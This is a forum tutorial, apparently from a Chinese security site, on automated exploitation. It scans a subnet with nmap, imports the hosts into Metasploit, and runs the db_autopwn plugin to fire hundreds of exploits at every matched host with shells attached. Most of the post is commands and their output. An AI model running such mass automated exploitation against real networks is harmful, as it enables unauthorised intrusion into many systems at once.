切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
132 网络扫描 nmap 和 Metasploit 自动溢出[复制链接]
发表于 2012-9-9 21:59:07 | 显示全部楼层 |!read_mode!

原理: 让NMAP通过扫描网络主机,导入METASPLOIT,利用插件自动溢出

1.安装插件
  1. root@Dis9Team:~# cd .msf4/
  2. root@Dis9Team:~/.msf4# ls
  3. config  history  john.pot  local  logs  loot  modcache  modules  plugins  schema
  4. root@Dis9Team:~/.msf4# cd plugins/
  5. root@Dis9Team:~/.msf4/plugins# wget https://raw.github.com/neinwechter/metasploit-framework/autopwn-modules/plugins/db_autopwn.rb
  6. --2012-06-19 09:44:51--  https://raw.github.com/neinwechter/metasploit-framework/autopwn-modules/plugins/db_autopwn.rb
  7. Resolving raw.github.com... 207.97.227.243
  8. Connecting to raw.github.com|207.97.227.243|:443... connected.
  9. HTTP request sent, awaiting response... 200 OK
  10. Length: 14664 (14K) [text/plain]
  11. Saving to: `db_autopwn.rb'

  12. 100%[====================================================================================>] 14,664      --.-K/s   in 0s      

  13. 2012-06-19 09:44:53 (1.81 GB/s) - `db_autopwn.rb' saved [14664/14664]

  14. root@Dis9Team:~/.msf4/plugins#
复制代码
测试:
  1. msf > load db_autopwn
  2. [*] Successfully loaded plugin: db_autopwn
  3. msf >
复制代码

成功了

2.获得服务

先删除老数据,msf > hosts -d,用NMAP扫描整个网段:

  1. root@Dis9Team:~/.msf4/plugins# nmap 192.168.40.0/24 -T3 -O -v -sT -p 1-60000 -oX /tmp/1.xml
复制代码
导入数据:

  1. msf > db_import /tmp/1.xml
  2. [*] Importing 'Nmap XML' data
  3. [*] Import: Parsing with 'Nokogiri v1.5.4'
  4. [*] Importing host 192.168.40.1
  5. [*] Importing host 192.168.40.2
  6. [*] Importing host 192.168.40.129
  7. [*] Importing host 192.168.40.130
  8. [*] Importing host 192.168.40.131
  9. [*] Importing host 192.168.40.134
  10. [*] Successfully imported /tmp/1.xml
  11. msf >
复制代码
查看:

  1. msf > hosts

  2. Hosts
  3. =====

  4. address         mac                name  os_name            os_flavor  os_sp  purpose  info  comments
  5. -------         ---                ----  -------            ---------  -----  -------  ----  --------
  6. 192.168.40.1    00:50:56:C0:00:08        Microsoft Windows  7                 device         
  7. 192.168.40.2    00:50:56:F1:8A:E4        Bluebird SuperDOS                    device         
  8. 192.168.40.129  00:0C:29:EB:F8:94        Microsoft Windows  XP                device         
  9. 192.168.40.130  00:0C:29:39:12:B2        Linux              2.6.X             device         
  10. 192.168.40.131  00:0C:29:93:DA:7B        Microsoft Windows  2003              device         
  11. 192.168.40.134                           Linux              2.6.X             device         

  12. msf > services

  13. Services
  14. ========

  15. host            port  proto  name              state     info
  16. ----            ----  -----  ----              -----     ----
  17. 192.168.40.1    843   tcp    unknown           open      
  18. 192.168.40.1    9001  tcp    tor-orport        open      
  19. 192.168.40.2    53    tcp    domain            filtered  
  20. 192.168.40.129  23    tcp    telnet            open      
  21. 192.168.40.129  139   tcp    netbios-ssn       open      
  22. 192.168.40.129  445   tcp    microsoft-ds      open      
  23. 192.168.40.129  3389  tcp    ms-wbt-server     open      
  24. 192.168.40.130  23    tcp    telnet            open      
  25. 192.168.40.130  22    tcp    ssh               open      
  26. 192.168.40.130  21    tcp    ftp               open      
  27. 192.168.40.130  25    tcp    smtp              open      
  28. 192.168.40.130  53    tcp    domain            open      
  29. 192.168.40.130  80    tcp    http              open      
  30. 192.168.40.130  139   tcp    netbios-ssn       open      
  31. 192.168.40.130  445   tcp    microsoft-ds      open      
  32. 192.168.40.130  3306  tcp    mysql             open      
  33. 192.168.40.130  5432  tcp    postgresql        open      
  34. 192.168.40.130  8180  tcp    unknown           open      
  35. 192.168.40.130  8009  tcp    ajp13             open      
  36. 192.168.40.131  53    tcp    domain            open      
  37. 192.168.40.131  88    tcp    kerberos-sec      open      
  38. 192.168.40.131  135   tcp    msrpc             open      
  39. 192.168.40.131  139   tcp    netbios-ssn       open      
  40. 192.168.40.131  389   tcp    ldap              open      
  41. 192.168.40.131  445   tcp    microsoft-ds      open      
  42. 192.168.40.131  464   tcp    kpasswd5          open      
  43. 192.168.40.131  593   tcp    http-rpc-epmap    open      
  44. 192.168.40.131  3269  tcp    globalcatldapssl  open      
  45. 192.168.40.131  1025  tcp    nfs-or-iis        open      
  46. 192.168.40.131  1027  tcp    iis               open      
  47. 192.168.40.131  1039  tcp    sbl               open      
  48. 192.168.40.131  1061  tcp    kiosk             open      
  49. 192.168.40.131  3268  tcp    globalcatldap     open      
  50. 192.168.40.131  636   tcp    ldapssl           open      
  51. 192.168.40.134  22    tcp    ssh               open      

  52. msf >
复制代码
3.自动溢出载入插件:
  1. msf > load db_autopwn
  2. [*] Successfully loaded plugin: db_autopwn
  3. msf >
复制代码
查看帮助:
  1. msf > db_autopwn -h
  2. [-]
  3. [-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
  4. [-]          This code is not well maintained, crashes systems, and crashes itself.
  5. [-]          Use only if you understand it's current limitations/issues.
  6. [-]          Minimal support and development via neinwechter on GitHub metasploit fork.
  7. [-]
  8. [*] Usage: db_autopwn [options]
  9.         -h          Display this help text
  10.         -t          Show all matching exploit modules
  11.         -x          Select modules based on vulnerability references
  12.         -p          Select modules based on open ports
  13.         -e          Launch exploits against all matched targets
  14.         -r          Use a reverse connect shell
  15.         -b          Use a bind shell on a random port (default)
  16.         -q          Disable exploit module output
  17.         -R  [rank]  Only run modules with a minimal rank
  18.         -I  [range] Only exploit hosts inside this range
  19.         -X  [range] Always exclude hosts inside this range
  20.         -PI [range] Only exploit hosts with these ports open
  21.         -PX [range] Always exclude hosts with these ports open
  22.         -m  [regex] Only run modules whose name matches the regex
  23.         -T  [secs]  Maximum runtime for any exploit in seconds

  24. msf >
复制代码
自动监听SHELL并且溢出攻击
  1. msf > db_autopwn -p -e -t
复制代码
然后就是漫长的等待 421个EXP..
这个东西,是在没办法的生活试试…..有的人说多牛B 垃圾一个





附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2015-10-20 13:48:26 | 显示全部楼层
谢谢。。学习了
发表于 2015-10-20 14:30:56 | 显示全部楼层
这个方法扫描起来比较慢。。
发表于 2016-3-11 17:27:14 | 显示全部楼层
已存,,,
发表于 2016-3-11 19:09:21 | 显示全部楼层
现在几乎是win7或者更高版本的。不好搞的。

代码区

GMT+8, 2020-9-20 12:39

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部